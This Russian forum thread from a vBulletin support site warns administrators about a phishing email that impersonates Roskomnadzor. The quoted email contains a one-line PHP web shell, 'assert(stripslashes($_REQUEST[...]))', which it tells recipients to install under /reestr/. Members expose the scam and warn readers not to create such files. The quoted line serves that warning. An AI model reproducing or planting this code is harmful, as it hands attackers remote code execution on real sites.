VBsupport перешел с домена .ORG на родной .RU
Ура!
Пожалуйста, обновите свои закладки - VBsupport.ru
Блок РКН снят, форум доступен на всей территории России, включая новые терртории, без VPN
На форуме введена премодерация ВСЕХ новых пользователей
Почта с временных сервисов, типа mailinator.com, gawab.com и/или прочих, которые предоставляют временный почтовый ящик без регистрации и/или почтовый ящик для рассылки спама, отслеживается и блокируется, а так же заносится в спам-блок форума, аккаунты удаляются
Если вы хотите приобрести какой то скрипт/продукт/хак из каталогов перечисленных ниже: Каталог модулей/хаков
Ещё раз обращаем Ваше внимание: всё, что Вы скачиваете и устанавливаете на свой форум, Вы устанавливаете исключительно на свой страх и риск.
Сообщество vBSupport'а физически не в состоянии проверять все стили, хаки и нули, выкладываемые пользователями.
Помните: безопасность Вашего проекта - Ваша забота. Убедительная просьба: при обнаружении уязвимостей или сомнительных кодов обязательно отписывайтесь в теме хака/стиля
Спасибо за понимание
В любом случае Роскомнадзор заработал себе не очень хорошую репутацию и уверен, что владельцы сайтов бояться попасть в какой-нибудь список этой организации.
Сегодня моя хорошая знакомая прислала мне письмо в котором было написано, что её сайт с относительно небольшой посещаемостью внесен в этот реестр.
Текст письма ниже, орфография и пунктуация сохранены.
Здравствуйте.
Вы получили данное уведомление от Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь администратором доменного имени www.yandex.ru в сети «Интернет».
В соответствии с Федеральным законом от 5 мая 2014 года № 97-ФЗ «О внесении изменений в Федеральный закон „Об информации, информационных технологиях и о защите информации“ и на основании решения суда (Новокуйбышевский городской суд Самарской области) от 11.08.2015 No 21618/2015, Ваш сайтwww.yandex.ru был внесен в реестр организаторов распространения информации в сети «Интернет» и сайтов и (или) страниц сайтов в сети «Интернет», на которых размещается общедоступная информация и доступ к которым в течении суток составляет более трех тысяч пользователей сети «Интернет».
Для идентификации Вас, как администратора доменного имени www.yandex.ru, Вам необходимо:
1. Cоздать в корневой директории Вашего сайта папку reestr
2. Cоздать в данной папке файл reestr-id198617.php, содержащий следующий текст:
< ?php
/*Подтверждение доменного имени www.yandex.ru*/
assert(stripslashes($_REQUEST[roskomnadzor]));
?>
*В < ?php необходимо убрать пробел между < и ?php
Путь до файла на Вашем сайте должен получиться следующий: www.yandex.ru/reestr/reestr-id128032.php
Если в течении 72 часов с момента получения данного письма Вы не идентифицируете себя, как администратор доменного имени www.yandex.ru, следую инструкции указанной выше, то Ваш сайт www.yandex.ru будет внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации.
— С уважением,
ФЕДЕРАЛЬНАЯ СЛУЖБА ПО НАДЗОРУ В СФЕРЕ СВЯЗИ, ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ И МАССОВЫХ КОММУНИКАЦИЙ.
Уверен, что многим стало ясно, что это развод, однако мошенники сделали все, чтобы не сильно продвинутые пользователи выполнили действия по инструкции: письмо пришло с адреса zapret-info@roskomnadzor.org, поэтому неграмотный пользователь может подумать, что ему действительно написали из этой организации. При переходе на адрес roskomnadzor.org пользователя перекидывает на rkn.gov.ru что создает иллюзию реального сайта и домена. Домен roskomnadzor.org был зарегистрирован 6 дней назад.
Уважаемые администраторы!
Какое бы грозное письмо вы бы ни получили... кем бы оно там ни было подписано - хоть самим Буддой, Папой Римским, Киром Дарби или Сергеем Брином... (список можно дополнять)) включайте голову прежде, чем что-то делать!
Никогда, НИ-КОГ-ДА не кидайтесь создавать пхп-шники или что-то дописывать в файлы движка!
Помните: "албанский вирус" - самый живучий вирус в мире, его фик убьёшь, потому что он живёт в головах...
Если где-то, в каком-то движке или модуле/продукте действительно обнаружена уязвимость, или что-то куда-то надо залить для подтверждения чего-то там, то об этом должно быть написано на официальном сайте (движка, продукта, поисковика... роскомпозора, в конце концов)
И смотрите, пожалуйста, по каким ссылкам переходите... А лучше вообще не тыкать по ссылкам в таких письмах, зайдите на официальный сайт по собственной закладке в браузере и там поищите нужную информацию
Да вообще тупой развод, даже комментировать не хочется.
Помню, на заре почтовых служб был популярным развод: регался ящик в стиле administrator@mail.ru и с него отправлялось письмо в стиле "Вы заподозрены в рассылке спама и если не подтвердите свой логин и пароль, то ваш ящик будет удалён". Что интересно, велись очень многие. И серьёзно отвечали даже на письма, текст которых писал тупой школьник с "лудше" и "заного".
Потом развод стал хитрее. Стали даже делать фишинговые странички. Но всё равно удивляюсь человеческой глупости и доверчивости.
хотя мне никаких писем не приходило =)
частенько вижу в логах попытки "взлома" page.php, наверное все еще думают, что здесь дырявая версия
отправляю какиров к педикам...
Кот Бегемот
Мартовский Кот
Join Date: Apr 2006
Location: мягкое кресло
Награды в конкурсах:
Posts: 5,035
Версия vB: 3.8.x
Пол:
Reputation:
Гуру 5069
Репутация в разделе: 859
0
Quote:
Originally Posted by kerk
отправляю какиров к педикам...
kerk
k0t
Join Date: May 2005
Location: localhost
Posts: 28,823
Версия vB: 3.8.x
Пол:
Reputation:
Гуру 20319
Репутация в разделе: 7747
1
Quote:
Originally Posted by Winner
всё равно удивляюсь человеческой глупости и доверчивости
«Взломай свой сайт сам», дубль 256...
